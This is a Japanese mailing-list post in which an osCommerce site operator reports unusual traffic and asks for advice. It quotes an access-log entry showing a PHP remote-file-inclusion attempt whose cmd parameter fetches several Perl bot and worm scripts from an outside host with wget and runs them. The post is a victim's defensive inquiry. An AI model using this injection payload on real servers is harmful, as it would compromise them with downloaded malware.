kushima michio
michiok_mac****@mac*****
2004年 12月 26日 (日) 12:33:46 JST
michio です。 昨日から、異常にアクセスが増えて、調べてみたところ、 以下のように、OSCで利用するPHPへのアクセスに対して、 何か不正を働こうとしているようです。 67.19.230.106 - - [26/Dec/2004:04:02:06 +0900] "GET /information.php?tpl=http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget www.visualcoders.net/php.txt;wget www.visualcoders.net/ownz.txt;wget www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl ownz.txt;perl php.txt HTTP/1.1" 200 31573 "-" "LWP::Simple/5.800" 何か、聞くところを間違えてる気もしますが、今まで、経験が無く、 放置していいものか悩みまして、書き込みしてみました。 PHPのバージョンによっては、まずいとかそういう話なんだとは思いますが、 検索では引っかかってこなかったので、もし何か情報あれば、お教えいただけないかとおもい、 書き込んでみました。 -------------- michio
